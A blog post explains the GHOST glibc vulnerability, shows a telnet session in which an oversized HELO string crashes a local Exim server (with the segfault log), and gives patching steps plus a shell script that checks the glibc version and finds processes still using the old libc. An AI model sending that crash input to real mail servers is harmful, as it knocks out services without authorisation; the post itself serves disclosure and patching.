So the GHOST vulnerability has been a hot topic. Articles like this and this discuss what it’s about and its effects, so I won’t go into that.

Reading further, I find that articles like this highlight the point that the danger of this vulnerability is limited, since initially there are only 4 to 8 bytes of overflow to work with, and additional coding is necessary to take further advantage of it.

Exploit Example

There is a proof of concept demonstrating an exploit against the Exim mail server in this Python script, with further explanation here. In this example the attacker can trigger a segmentation fault in the server remotely.

user@...ian-7-7-64b:~$ telnet 127.0.0.1 25
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
220 debian-7-7-64b ESMTP Exim 4.80 ...
HELO 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
Connection closed by foreign host.

user@...ian-7-7-64b:~$ dmesg
...
[ 1715.842547] exim4[2562]: segfault at 7fabf1f0ecb8 ip 00007fabef31bd04 sp 00007fffb427d5b0 error 6 in libc-2.13.so[7fabef2a2000+182000]

This is only an Exim-specific exploit, but it opens up the possibility of other software having similar (or worse) exploits.

Protecting yourself against it

Amazon has already released a patch.
So anyone using the Amazon Linux AMI should go ahead and patch this up with

yum clean all
yum update glibc

Check that the updated glibc package version is glibc-2.17-55.93.amzn1.
After that, reboot your instance for the fix to take effect everywhere.
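Two things are worth verifying after that update before you put an instance back behind the load balancer: that the installed package really is at least the fixed build, and that no long-running process (Exim, for instance) still has the old libc mapped, which is what the reboot is for. The script below is an added example and is not from the original post; it assumes an Amazon Linux host with rpm and a Linux /proc, and the function names (ver_ge, glibc_patched, maps_has_stale_libc, stale_libc_pids) are mine. The FIXED_GLIBC value is the build named above.

```shell
#!/bin/sh
# Added example, not from the original post: after "yum update glibc" on an
# Amazon Linux instance, confirm the installed package is at least the fixed
# build and find processes that still map the old libc (the reason the post
# tells you to reboot). Assumes rpm and a Linux /proc; FIXED_GLIBC is the
# build named in the post.

FIXED_GLIBC="2.17-55.93.amzn1"

# ver_ge A B: succeed if version string A is >= B, comparing field by field
# on '.' and '-' (numeric fields numerically, anything else as text;
# a missing trailing field counts as 0).
ver_ge() {
    awk -v a="$1" -v b="$2" 'BEGIN {
        n = split(a, x, /[.-]/); m = split(b, y, /[.-]/)
        k = (n > m) ? n : m
        for (i = 1; i <= k; i++) {
            xi = (i <= n) ? x[i] : 0
            yi = (i <= m) ? y[i] : 0
            if (xi ~ /^[0-9]+$/ && yi ~ /^[0-9]+$/) { xi += 0; yi += 0 }
            if (xi < yi) exit 1
            if (xi > yi) exit 0
        }
        exit 0
    }'
}

# glibc_patched PKG: PKG is what "rpm -q glibc" prints, e.g.
# "glibc-2.17-55.93.amzn1.x86_64"; succeed if it is at least FIXED_GLIBC.
glibc_patched() {
    ver=${1#glibc-}
    case "$ver" in
        *.x86_64|*.i686|*.noarch) ver=${ver%.*} ;;   # drop the arch suffix
    esac
    ver_ge "$ver" "$FIXED_GLIBC"
}

# maps_has_stale_libc: read a /proc/PID/maps listing on stdin; succeed if the
# process maps a libc whose file on disk was replaced by the update (the
# kernel marks such mappings "(deleted)"). That process keeps running the
# vulnerable code until it is restarted or the host is rebooted.
maps_has_stale_libc() {
    grep -q '/libc[-.][^ ]* (deleted)$'
}

# stale_libc_pids: print the PIDs on this host that still map a deleted libc.
# Maps files of other users' processes are unreadable without root and are
# skipped silently.
stale_libc_pids() {
    for m in /proc/[0-9]*/maps; do
        if maps_has_stale_libc 2>/dev/null < "$m"; then
            p=${m#/proc/}
            printf '%s\n' "${p%/maps}"
        fi
    done
}

# main [PKG]: PKG overrides the rpm query (handy on a host without rpm).
main() {
    pkg=${1:-$(rpm -q glibc 2>/dev/null | head -n 1)}
    if [ -z "$pkg" ]; then
        echo "rpm not available and no package string given; nothing to check"
        return 0
    fi
    if glibc_patched "$pkg"; then
        echo "glibc OK: $pkg (>= $FIXED_GLIBC)"
    else
        echo "glibc VULNERABLE: $pkg (< $FIXED_GLIBC); run: yum clean all && yum update glibc"
    fi
    stale=$(stale_libc_pids)
    if [ -n "$stale" ]; then
        echo "processes still using the old libc (restart them or reboot):"
        echo "$stale"
    else
        echo "no process maps a deleted libc"
    fi
}

main "$@"
```

Run it once after the update and once after the reboot: the first run should report the fixed package but list the PIDs of daemons still holding the old libc, the second should list none. The /proc scan is the same fact lsof shows as "(deleted)" next to libc, just without depending on lsof being installed.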

It takes some work to remove each production server from the load balancer, patch and restart it, then attach it back to the load balancer… this took me some time and effort. I wish there were a way to do this more easily. Maybe it calls for some automation.


Oh well. Since we’ve seen Heartbleed, Shellshock, and POODLE already in the past year or two, I’m pretty sure we’ll run into more.
And I think that is a good thing, because we all benefit from vulnerabilities being patched, which in turn refines the software the community uses.